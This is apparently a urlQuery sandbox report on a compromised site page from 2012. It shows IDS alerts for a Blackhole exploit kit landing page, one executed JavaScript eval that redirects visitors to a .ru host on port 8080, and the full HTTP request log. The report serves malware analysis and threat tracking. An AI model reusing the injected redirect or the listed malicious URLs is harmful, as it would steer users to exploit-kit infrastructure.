Overview

URL: http://degusto.be/sites/default/files/forwarding.htm
IP: 178.18.135.17
ASN: AS25459 NedZone Internet BV
Location: Netherlands
Report completed: 2012-11-12 01:22:11 CET
urlQuery Alerts: No alerts detected


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer: (none)
Adobe Reader: 8.0
Java: 1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Timestamp            Source IP        Destination IP   Severity  Alert
2012-11-12 01:21:31  urlQuery Client  202.180.221.186  1         ET CURRENT_EVENTS Blackhole 2 Landing Page (5)

Snort /w Sourcefire VRT

Timestamp            Source IP        Destination IP   Severity  Alert
2012-11-12 01:21:30  178.18.135.17    urlQuery Client  1         EXPLOIT-KIT Blackholev2 landing page download attempt
2012-11-12 01:21:30  178.18.135.17    urlQuery Client  1         EXPLOIT-KIT Blackhole landing page download attempt


Recent reports on same IP/ASN/Domain

Last 1 reports on IP: 178.18.135.17

Date                 Alerts / IDS  URL                                                          IP
2012-11-09 21:44:55  0 / 3         http://www.degusto.be/sites/default/files/forwarding.htm    178.18.135.17

Last 6 reports on ASN: AS25459 NedZone Internet BV

Date                 Alerts / IDS  URL                                                                                             IP
2013-04-09 18:24:50  1 / 3         http://www.feestverlichting.net/index.php/index.php/index.php/index.php/spiegelbollen-a-toebeho (...)  178.18.138.17
2013-04-09 00:39:03  1 / 0         http://www.djcreative.nl/forum/viewtopic.php?f=86                                               94.103.157.175
2013-04-09 00:38:27  1 / 0         http://www.djcreative.nl/forum/memberlist.php?mode=viewprofile                                  94.103.157.175
2013-04-09 00:14:25  1 / 0         http://www.djcreative.nl/forum/viewtopic.php?f=86&t=1919                                        94.103.157.175
2013-04-09 00:12:09  1 / 0         http://www.djcreative.nl/forum/viewforum.php?f=86&start=0&sid=f79d6603e398a77a9419bbef3 (...)  94.103.157.175
2013-04-09 00:12:01  1 / 0         http://www.djcreative.nl/forum/memberlist.php?mode=viewprofile&u=928&sid=10314734513771 (...)  94.103.157.175



JavaScript

Executed Scripts (1)


Executed Evals (1)

#1 JavaScript::Eval (size: 112, repeated: 1)

var1 = 49;
var2 = var1;
if (var1 == var2) {
    document.location = "http://canadianpanakota.ru:8080/forum/links/column.php";
}

Executed Writes (0)



HTTP Transactions (5)


#1 Request

GET /sites/default/files/forwarding.htm HTTP/1.1

Host: degusto.be

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
#1 Response

HTTP/1.1 200 OK

Content-Type: text/html
Date: Mon, 12 Nov 2012 00:21:30 GMT
Server: Apache/2
Last-Modified: Mon, 12 Nov 2012 00:15:15 GMT
Etag: "2212da-509-4ce4132188a6a"
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Mon, 26 Nov 2012 00:21:30 GMT
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 661
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
#2 Request

GET /forum/links/column.php HTTP/1.1

Host: canadianpanakota.ru:8080

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://degusto.be/sites/default/files/forwarding.htm
#2 Response

HTTP/1.1 502 Bad Gateway

Content-Type: text/html; charset=CP-1251
Server: nginx/1.0.4
Date: Mon, 12 Nov 2012 00:19:24 GMT
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
#3 Request

GET /favicon.ico HTTP/1.1

Host: canadianpanakota.ru:8080

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
#3 Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Server: nginx/1.0.4
Date: Mon, 12 Nov 2012 00:19:25 GMT
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 244
#4 Request

GET /favicon.ico HTTP/1.1

Host: canadianpanakota.ru:8080

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
#4 Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Server: nginx/1.0.4
Date: Mon, 12 Nov 2012 00:19:27 GMT
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 244
#5 Request

GET /favicon.ico HTTP/1.1

Host: degusto.be

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
#5 Response

HTTP/1.1 404 Not Found

Content-Type: text/html; charset=utf-8
Date: Mon, 12 Nov 2012 00:21:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.3.11
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 12 Nov 2012 00:21:33 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Etag: "1352679693"
Set-Cookie: language=fr; expires=Mon, 19-Nov-2012 00:21:33 GMT; path=/
Set-Cookie: language=fr; expires=Mon, 19-Nov-2012 00:21:33 GMT; path=/
Content-Language: fr
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 166
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive